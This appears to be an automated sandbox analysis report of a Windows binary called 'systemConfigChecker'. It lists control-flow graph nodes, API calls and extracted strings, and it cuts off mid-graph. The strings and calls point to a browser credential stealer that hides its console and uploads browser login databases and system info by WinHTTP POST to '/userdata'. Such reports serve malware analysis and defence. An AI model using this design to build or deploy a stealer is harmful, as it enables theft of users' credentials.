7ff6b27081c0 3833->3835 3837 7ff6b27081b8 3833->3837 3838 7ff6b27081fd _invalid_parameter_noinfo_noreturn 3833->3838 3836 7ff6b270b500 _Receive_impl free 3834->3836 3834->3838 3835->3830 3836->3833 3839 7ff6b270b500 _Receive_impl free 3837->3839 3840 7ff6b2708223 3838->3840 3841 7ff6b2708254 3838->3841 3839->3835 3842 7ff6b270824c 3840->3842 3843 7ff6b270826b _invalid_parameter_noinfo_noreturn 3840->3843 3841->3830 3844 7ff6b270b500 _Receive_impl free 3842->3844 3844->3841 3712 7ff6b2709974 3713 7ff6b2709982 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 3712->3713 3714 7ff6b27099b2 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3713->3714 3715 7ff6b27099bc 3713->3715 3714->3715 3716 7ff6b270cf76 3717 7ff6b270cfab __current_exception __current_exception_context terminate 3716->3717 3718 7ff6b270cf9f 3716->3718 3717->3718 3662 7ff6b2701170 __std_exception_copy 3845 7ff6b2706ef0 3846 7ff6b2706f27 3845->3846 3848 7ff6b2706fa2 fgetc 3846->3848 3849 7ff6b2706fbe fgetc 3846->3849 3851 7ff6b2706f37 3846->3851 3847 7ff6b270b4e0 Concurrency::cancel_current_task 8 API calls 3850 7ff6b27071ab 3847->3850 3848->3851 3852 7ff6b27070f0 3849->3852 3858 7ff6b2706feb 3849->3858 3851->3847 3852->3851 3853 7ff6b2707198 3852->3853 3856 7ff6b270712f _invalid_parameter_noinfo_noreturn 3852->3856 3857 7ff6b270b500 _Receive_impl free 3853->3857 3854 7ff6b270702a ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD 3854->3858 3856->3852 3857->3851 3858->3852 3858->3854 3859 7ff6b270709d memcpy fgetc 3858->3859 3861 7ff6b270714e 3858->3861 3862 7ff6b270a570 3858->3862 3859->3852 3859->3858 3860 7ff6b2707170 ungetc 3860->3852 3860->3861 3861->3852 3861->3860 3863 7ff6b270a6c5 3862->3863 3880 7ff6b2701310 ?_Xlength_error@std@@YAXPEBD 3863->3880 3881 7ff6b27074f0 3882 7ff6b2707503 3881->3882 3883 7ff6b27074fc _unlock_file 3881->3883 3883->3882 3884 7ff6b270c67c 3885 7ff6b270c69c 3884->3885 3886 7ff6b270c68f 3884->3886 3887 7ff6b2708450 2 API calls 3886->3887 3887->3885 3663 7ff6b270cdfe ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA 3892 7ff6b270b888 3893 7ff6b270b898 3892->3893 3905 7ff6b270b68c 3893->3905 3895 7ff6b270bfac 9 API calls 3896 7ff6b270b93d 3895->3896 3897 7ff6b270b8bc _RTC_Initialize 3903 7ff6b270b91f 3897->3903 3913 7ff6b270c270 InitializeSListHead 3897->3913 3903->3895 3904 7ff6b270b92d 3903->3904 3906 7ff6b270b69d 3905->3906 3911 7ff6b270b6cf 3905->3911 3907 7ff6b270b70c 3906->3907 3910 7ff6b270b6a2 __scrt_release_startup_lock 3906->3910 3908 7ff6b270bfac 9 API calls 3907->3908 3909 7ff6b270b716 3908->3909 3910->3911 3912 7ff6b270b6bf _initialize_onexit_table 3910->3912 3911->3897 3912->3911 3914 7ff6b270ce88 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N 3730 7ff6b27069e0 3731 7ff6b2706a03 3730->3731 3732 7ff6b2706a21 setvbuf 3731->3732 3733 7ff6b2706a9f 3731->3733 3732->3733 3734 7ff6b2706a2f ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 3732->3734 3736 7ff6b270b4e0 Concurrency::cancel_current_task 8 API calls 3733->3736 3734->3733 3735 7ff6b2706a51 _get_stream_buffer_pointers 3734->3735 3735->3733 3737 7ff6b2706ace 3736->3737 3915 7ff6b2706ae0 3916 7ff6b2706b16 3915->3916 3917 7ff6b2706b35 3915->3917 3918 7ff6b27088f0 10 API calls 3916->3918 3919 7ff6b270b4e0 Concurrency::cancel_current_task 8 API calls 3917->3919 3920 7ff6b2706b1b 3918->3920 3921 7ff6b2706bab 3919->3921 3920->3917 3922 7ff6b2706b1f fsetpos 3920->3922 3922->3917 3667 7ff6b270c610 3668 7ff6b270b500 _Receive_impl free 3667->3668 3669 7ff6b270c627 3668->3669 3738 7ff6b2708790 3739 7ff6b2707c10 _Receive_impl 3 API calls 3738->3739 3740 7ff6b27087e1 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3739->3740 3741 7ff6b27087fa 3740->3741 3742 7ff6b270880b 3740->3742 3743 7ff6b270b500 _Receive_impl free 3741->3743 3743->3742 3931 7ff6b270c494 3932 7ff6b270c4cc __GSHandlerCheckCommon 3931->3932 3933 7ff6b270c4e7 __CxxFrameHandler4 3932->3933 3934 7ff6b270c4f8 3932->3934 3933->3934 3935 7ff6b270ba9a 3936 7ff6b270c0fc GetModuleHandleW 3935->3936 3937 7ff6b270baa1 3936->3937 3938 7ff6b270bae0 _exit 3937->3938 3939 7ff6b270baa5 3937->3939 3744 7ff6b27011d0 __std_exception_destroy 3745 7ff6b2701205 3744->3745 3746 7ff6b27011f8 3744->3746 3747 7ff6b270b500 _Receive_impl free 3746->3747 3747->3745 3940 7ff6b2706cd0 3941 7ff6b2706ce9 ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J 3940->3941 3943 7ff6b2706cf8 3940->3943 3941->3943 3942 7ff6b2706d79 3943->3942 3944 7ff6b2706d2c memcpy 3943->3944 3945 7ff6b2706d59 3943->3945 3944->3942 3944->3945 3945->3942 3946 7ff6b2706d65 fwrite 3945->3946 3946->3942 3947 7ff6b27068d0 3948 7ff6b270691e 3947->3948 3949 7ff6b27068e1 3947->3949 3950 7ff6b2706916 3949->3950 3951 7ff6b2706931 _invalid_parameter_noinfo_noreturn 3949->3951 3952 7ff6b270b500 _Receive_impl free 3950->3952 3957 7ff6b2709fb0 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 3951->3957 3952->3948 3955 7ff6b2706965 3956 7ff6b2706978 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 3958 7ff6b270a012 3957->3958 3959 7ff6b270a087 ??1_Lockit@std@@QEAA 3958->3959 3961 7ff6b270a029 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 3958->3961 3962 7ff6b270a035 3958->3962 3960 7ff6b270b4e0 Concurrency::cancel_current_task 8 API calls 3959->3960 3963 7ff6b2706955 ?always_noconv@codecvt_base@std@ 3960->3963 3961->3962 3962->3959 3964 7ff6b270a04c ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 3962->3964 3963->3955 3963->3956 3965 7ff6b270a0b7 3964->3965 3966 7ff6b270a060 3964->3966 3974 7ff6b2701470 3965->3974 3971 7ff6b270b448 3966->3971 3969 7ff6b270a0bc 3972 7ff6b270b508 std::_Facet_Register 3 API calls 3971->3972 3973 7ff6b270a072 3972->3973 3973->3959 3977 7ff6b2701440 3974->3977 3976 7ff6b270147e _CxxThrowException __std_exception_copy 3976->3969 3977->3976 3670 7ff6b270d01c 3672 7ff6b270d024 3670->3672 3671 7ff6b270d071 3672->3671 3673 7ff6b270b500 _Receive_impl free 3672->3673 3673->3672 3226 7ff6b2706bc0 3227 7ff6b2706bf3 3226->3227 3234 7ff6b2706c51 3227->3234 3235 7ff6b27088f0 3227->3235 3230 7ff6b2706c16 3232 7ff6b2706c24 _fseeki64 3230->3232 3233 7ff6b2706c3b fgetpos 3230->3233 3230->3234 3232->3233 3232->3234 3233->3234 3247 7ff6b270b4e0 3234->3247 3236 7ff6b27089c3 3235->3236 3237 7ff6b2708913 3235->3237 3238 7ff6b270b4e0 Concurrency::cancel_current_task 8 API calls 3236->3238 3237->3236 3239 7ff6b270891d 3237->3239 3240 7ff6b27089d2 3238->3240 3241 7ff6b2708936 ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD 3239->3241 3243 7ff6b2708961 3239->3243 3240->3230 3242 7ff6b270895c 3241->3242 3242->3243 3246 7ff6b2708997 fwrite 3242->3246 3244 7ff6b270b4e0 Concurrency::cancel_current_task 8 API calls 3243->3244 3245 7ff6b270897e 3244->3245 3245->3230 3246->3243 3248 7ff6b270b4e9 3247->3248 3249 7ff6b2706cbb 3248->3249 3250 7ff6b270bb34 IsProcessorFeaturePresent 3248->3250 3251 7ff6b270bb4c 3250->3251 3256 7ff6b270bc08 RtlCaptureContext 3251->3256 3257 7ff6b270bc22 RtlLookupFunctionEntry 3256->3257 3258 7ff6b270bc38 RtlVirtualUnwind 3257->3258 3259 7ff6b270bb5f 3257->3259 3258->3257 3258->3259 3260 7ff6b270bb00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3259->3260 3752 7ff6b27017c0 3753 7ff6b2707c10 _Receive_impl 3 API calls 3752->3753 3754 7ff6b2701802 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3753->3754 3779 7ff6b2707240 3780 7ff6b270725b 3779->3780 3781 7ff6b27072ab ungetc 3780->3781 3782 7ff6b2707271 3780->3782 3781->3782 3755 7ff6b270cdae ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA 3678 7ff6b2708830 ??1?$codecvt@_WDU_Mbstatet@@@std@@MEAA 3679 7ff6b2708861 3678->3679 3680 7ff6b2708854 3678->3680 3681 7ff6b270b500 _Receive_impl free 3680->3681 3681->3679 3682 7ff6b270c630 3683 7ff6b270c658 3682->3683 3684 7ff6b270c643 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3682->3684 3684->3683 3783 7ff6b270cf30 ??1_Lockit@std@@QEAA 3979 7ff6b27088b0 ?uncaught_exception@std@ 3980 7ff6b27088cd 3979->3980 3981 7ff6b27088c3 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3979->3981 3981->3980 3982 7ff6b27086b0 3983 7ff6b2707530 13 API calls 3982->3983 3984 7ff6b2708704 ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3983->3984 3985 7ff6b2708720 3984->3985 3986 7ff6b2708731 3984->3986 3987 7ff6b270b500 _Receive_impl free 3985->3987 3987->3986
          APIs
            • Part of subcall function 00007FF6B2701520: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B270157F
            • Part of subcall function 00007FF6B2701520: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF6B270159E
            • Part of subcall function 00007FF6B2701520: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B27015D2
            • Part of subcall function 00007FF6B2701520: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF6B2701609
            • Part of subcall function 00007FF6B2701520: isalnum.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6B2701648
            • Part of subcall function 00007FF6B2701520: ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140 ref: 00007FF6B270166D
            • Part of subcall function 00007FF6B2701520: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF6B270169B
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2701C67
          • memcpy.VCRUNTIME140 ref: 00007FF6B2701CAF
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2701DB1
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2701E02
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2701E53
          • WinHttpOpen.WINHTTP ref: 00007FF6B2701E86
          • WinHttpConnect.WINHTTP ref: 00007FF6B2701EC2
          • memcpy.VCRUNTIME140 ref: 00007FF6B270207E
          • memcpy.VCRUNTIME140 ref: 00007FF6B27021A4
          • GetFileAttributesW.KERNELBASE ref: 00007FF6B2702254
          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6B27022A7
          • memcpy.VCRUNTIME140 ref: 00007FF6B27024FF
          • memcmp.VCRUNTIME140 ref: 00007FF6B2702597
          • memcpy.VCRUNTIME140 ref: 00007FF6B27027C6
          • memcpy.VCRUNTIME140 ref: 00007FF6B2702BF9
            • Part of subcall function 00007FF6B270A0C0: memcpy.VCRUNTIME140 ref: 00007FF6B270A0F8
          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6B270301F
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B270302A
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2703031
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2703038
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B270303F
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2703046
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B270304D
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2703054
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B270305B
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2703062
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2703069
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2703070
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2703077
          • WinHttpCloseHandle.WINHTTP ref: 00007FF6B2703357
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B270339F
          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6B27033C6
          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6B27033D6
          • GetLastError.KERNEL32 ref: 00007FF6B27033A6
            • Part of subcall function 00007FF6B27099F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709AE6
          • WinHttpCloseHandle.WINHTTP ref: 00007FF6B27033E9
          • GetLastError.KERNEL32 ref: 00007FF6B27033F1
          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6B2703411
          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6B2703421
          • WinHttpCloseHandle.WINHTTP ref: 00007FF6B270342A
          • GetLastError.KERNEL32 ref: 00007FF6B2703432
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B270307E
            • Part of subcall function 00007FF6B27099F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709A69
            • Part of subcall function 00007FF6B27099F0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709A89
            • Part of subcall function 00007FF6B27099F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709A99
            • Part of subcall function 00007FF6B27099F0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B7C
            • Part of subcall function 00007FF6B27099F0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B83
            • Part of subcall function 00007FF6B27099F0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B90
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2703085
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B270308C
          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6B27023CE
            • Part of subcall function 00007FF6B270B508: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6B270B538
            • Part of subcall function 00007FF6B270B508: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6B270B53E
          • WinHttpOpenRequest.WINHTTP ref: 00007FF6B2701F1F
            • Part of subcall function 00007FF6B270B508: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6B270107B), ref: 00007FF6B270B522
          • memcpy.VCRUNTIME140 ref: 00007FF6B27030E8
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B270313F
          • WinHttpSendRequest.WINHTTP ref: 00007FF6B270318B
          • WinHttpReceiveResponse.WINHTTP ref: 00007FF6B270319E
          • WinHttpQueryHeaders.WINHTTP ref: 00007FF6B27031D5
          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6B270324A
          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6B270325A
          • WinHttpCloseHandle.WINHTTP ref: 00007FF6B2703263
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B27032A2
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B27032F0
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2703338
          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6B2703452
          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6B2703462
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2703494
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B27034DC
          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6B2703519
          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6B270351F
          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6B2703525
          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6B2703537
          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6B270353D
          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6B2703549
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: _invalid_parameter_noinfo_noreturn$V01@$U?$char_traits@$D@std@@@std@@$??6?$basic_ostream@$Http$Concurrency::cancel_current_taskmemcpy$V01@@$CloseHandle$ErrorLastU?$char_traits@_W@std@@@std@@$?good@ios_base@std@@OpenRequest$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?setw@std@@?sputc@?$basic_streambuf@?uncaught_exception@std@@AttributesConnectD@std@@@1@_FileHeadersJ@1@_Osfx@?$basic_ostream@_QueryReceiveResponseSendSmanip@_U?$_V12@V21@@V?$basic_streambuf@Vios_base@1@isalnummallocmemcmp
          • String ID: $" }$", "ip": "$"; filename="login_data$--WebKitFormBoundary$.json"$.sqlite"$/userdata$?? ??????? ???????? ????? ?? ???????.$?? ??????? ????????? ??????. HTTP ?????? ???: $?????? ??????? ??????????. HTTP ?????? ???: $?????? ???????? ?????? WinHTTP: $?????? ???????? ???????: $?????? ???????? HTTP-???????: $?????? ?????????? ? ????????: $Content-Disposition: form-data; name="sysinfo"$Content-Type: application/json$Content-Type: application/x-sqlite3$Content-Type: multipart/form-data; boundary=WebKitFormBoundary$File is found: $File not found: $FileData is empty$POST$WinHTTP/1.0$brave$chrome$chromebeta$chromium$firefox$fo": "$msedge$name="$opera$operagx$yandex
          • API String ID: 3244378811-4092172495
          • Opcode ID: e5d21f8269266fc38fbdbaff60fb5f9290399c69a2913e43641f2a0b35d44255
          • Instruction ID: ba236a275807096572db7c4d6fe6aa25c938961b57a902eadaf2b27b8d20326a
          • Opcode Fuzzy Hash: e5d21f8269266fc38fbdbaff60fb5f9290399c69a2913e43641f2a0b35d44255
          • Instruction Fuzzy Hash: 4EE2B762E18B8685EB12CB2DD4403FE23A1EB46798F505631DB6C876D5DFBDE189C308

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 483 7ff6b2705d80-7ff6b2705e24 GetConsoleWindow ShowWindow call 7ff6b2709610 call 7ff6b2704a40 call 7ff6b27083c0 490 7ff6b2705e5b-7ff6b2705e92 call 7ff6b2709610 call 7ff6b2704640 call 7ff6b27083c0 483->490 491 7ff6b2705e26-7ff6b2705e38 483->491 502 7ff6b2705e94-7ff6b2705ea6 490->502 503 7ff6b2705ec9-7ff6b2705f00 call 7ff6b2709610 call 7ff6b2703560 call 7ff6b27083c0 490->503 492 7ff6b2705e3a-7ff6b2705e4d 491->492 493 7ff6b2705e56 call 7ff6b270b500 491->493 492->493 495 7ff6b2705e4f-7ff6b2705e55 _invalid_parameter_noinfo_noreturn 492->495 493->490 495->493 505 7ff6b2705ec4 call 7ff6b270b500 502->505 506 7ff6b2705ea8-7ff6b2705ebb 502->506 514 7ff6b2705f02-7ff6b2705f14 503->514 515 7ff6b2705f37-7ff6b2705fe7 call 7ff6b2709610 GlobalMemoryStatusEx memset call 7ff6b2706810 call 7ff6b27099f0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z call 7ff6b27099f0 503->515 505->503 506->505 508 7ff6b2705ebd-7ff6b2705ec3 _invalid_parameter_noinfo_noreturn 506->508 508->505 516 7ff6b2705f32 call 7ff6b270b500 514->516 517 7ff6b2705f16-7ff6b2705f29 514->517 528 7ff6b270600a-7ff6b270600d 515->528 529 7ff6b2705fe9-7ff6b2705ff3 515->529 516->515 517->516 519 7ff6b2705f2b-7ff6b2705f31 _invalid_parameter_noinfo_noreturn 517->519 519->516 531 7ff6b2706031-7ff6b2706035 528->531 532 7ff6b270600f-7ff6b2706019 528->532 529->528 530 7ff6b2705ff5-7ff6b2706008 529->530 533 7ff6b2706039-7ff6b270603c 530->533 531->533 532->531 534 7ff6b270601b-7ff6b270602f 532->534 535 7ff6b270603e-7ff6b2706048 call 7ff6b27096c0 533->535 536 7ff6b2706049-7ff6b27060a8 call 7ff6b2707c10 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6b27083c0 533->536 534->533 535->536 543 7ff6b27060dc-7ff6b2706113 call 7ff6b2709610 call 7ff6b2703780 call 7ff6b27083c0 536->543 544 7ff6b27060aa-7ff6b27060bc 536->544 563 7ff6b2706115-7ff6b2706127 543->563 564 7ff6b270614a-7ff6b2706181 call 7ff6b2709610 call 7ff6b2703aa0 call 7ff6b27083c0 543->564 545 7ff6b27060be-7ff6b27060d1 544->545 546 7ff6b27060d7 call 7ff6b270b500 544->546 545->546 548 7ff6b270676e-7ff6b2706774 _invalid_parameter_noinfo_noreturn 545->548 546->543 552 7ff6b2706775 call 7ff6b270b500 548->552 555 7ff6b270677a-7ff6b2706796 552->555 557 7ff6b27067cc-7ff6b27067fd call 7ff6b270b4e0 555->557 558 7ff6b2706798-7ff6b27067a9 555->558 560 7ff6b27067ab-7ff6b27067be 558->560 561 7ff6b27067c7 call 7ff6b270b500 558->561 560->561 567 7ff6b27067c0-7ff6b27067c6 _invalid_parameter_noinfo_noreturn 560->567 561->557 565 7ff6b2706145 call 7ff6b270b500 563->565 566 7ff6b2706129-7ff6b270613c 563->566 578 7ff6b2706183-7ff6b2706195 564->578 579 7ff6b27061b8-7ff6b27061da call 7ff6b2704e50 564->579 565->564 566->565 571 7ff6b270613e-7ff6b2706144 _invalid_parameter_noinfo_noreturn 566->571 567->561 571->565 581 7ff6b27061b3 call 7ff6b270b500 578->581 582 7ff6b2706197-7ff6b27061aa 578->582 586 7ff6b27061e0-7ff6b270620d 579->586 587 7ff6b27067fe-7ff6b2706803 call 7ff6b2701310 579->587 581->579 582->581 584 7ff6b27061ac-7ff6b27061b2 _invalid_parameter_noinfo_noreturn 582->584 584->581 588 7ff6b270620f-7ff6b2706219 586->588 589 7ff6b2706288-7ff6b2706315 memcpy call 7ff6b2709610 call 7ff6b27083c0 586->589 599 7ff6b2706804-7ff6b2706809 call 7ff6b2701270 587->599 592 7ff6b270624b-7ff6b270625e 588->592 593 7ff6b270621b-7ff6b2706228 588->593 612 7ff6b270634d-7ff6b2706355 589->612 613 7ff6b2706317-7ff6b2706329 589->613 597 7ff6b2706264-7ff6b270626b 592->597 598 7ff6b2706260-7ff6b2706262 592->598 596 7ff6b270622c-7ff6b2706237 call 7ff6b270b508 593->596 614 7ff6b270637f-7ff6b2706385 _invalid_parameter_noinfo_noreturn 596->614 615 7ff6b270623d-7ff6b2706249 596->615 603 7ff6b270626d-7ff6b2706274 597->603 604 7ff6b270627c-7ff6b2706281 call 7ff6b270b508 597->604 602 7ff6b2706284 598->602 602->589 603->599 609 7ff6b270627a 603->609 604->602 609->596 619 7ff6b270638b-7ff6b27063c2 call 7ff6b2709610 call 7ff6b2703cd0 call 7ff6b27083c0 612->619 620 7ff6b2706357-7ff6b2706368 612->620 617 7ff6b270632b-7ff6b270633e 613->617 618 7ff6b2706347-7ff6b270634c call 7ff6b270b500 613->618 616 7ff6b2706386 call 7ff6b270b500 614->616 615->602 616->619 617->618 624 7ff6b2706340-7ff6b2706346 _invalid_parameter_noinfo_noreturn 617->624 618->612 632 7ff6b27063c4-7ff6b27063d6 619->632 633 7ff6b27063f9-7ff6b2706430 call 7ff6b2709610 call 7ff6b2703f60 call 7ff6b27083c0 619->633 620->616 621 7ff6b270636a-7ff6b270637d 620->621 621->614 621->616 624->618 635 7ff6b27063f4 call 7ff6b270b500 632->635 636 7ff6b27063d8-7ff6b27063eb 632->636 644 7ff6b2706432-7ff6b2706444 633->644 645 7ff6b2706467-7ff6b2706488 call 7ff6b2704180 call 7ff6b27083c0 633->645 635->633 636->635 638 7ff6b27063ed-7ff6b27063f3 _invalid_parameter_noinfo_noreturn 636->638 638->635 646 7ff6b2706462 call 7ff6b270b500 644->646 647 7ff6b2706446-7ff6b2706459 644->647 654 7ff6b27064bf-7ff6b2706555 memset call 7ff6b2706810 GetModuleFileNameA call 7ff6b27099f0 * 3 645->654 655 7ff6b270648a-7ff6b270649c 645->655 646->645 647->646 649 7ff6b270645b-7ff6b2706461 _invalid_parameter_noinfo_noreturn 647->649 649->646 668 7ff6b2706578-7ff6b270657b 654->668 669 7ff6b2706557-7ff6b2706561 654->669 656 7ff6b270649e-7ff6b27064b1 655->656 657 7ff6b27064ba call 7ff6b270b500 655->657 656->657 659 7ff6b27064b3-7ff6b27064b9 _invalid_parameter_noinfo_noreturn 656->659 657->654 659->657 671 7ff6b270659f-7ff6b27065a3 668->671 672 7ff6b270657d-7ff6b2706587 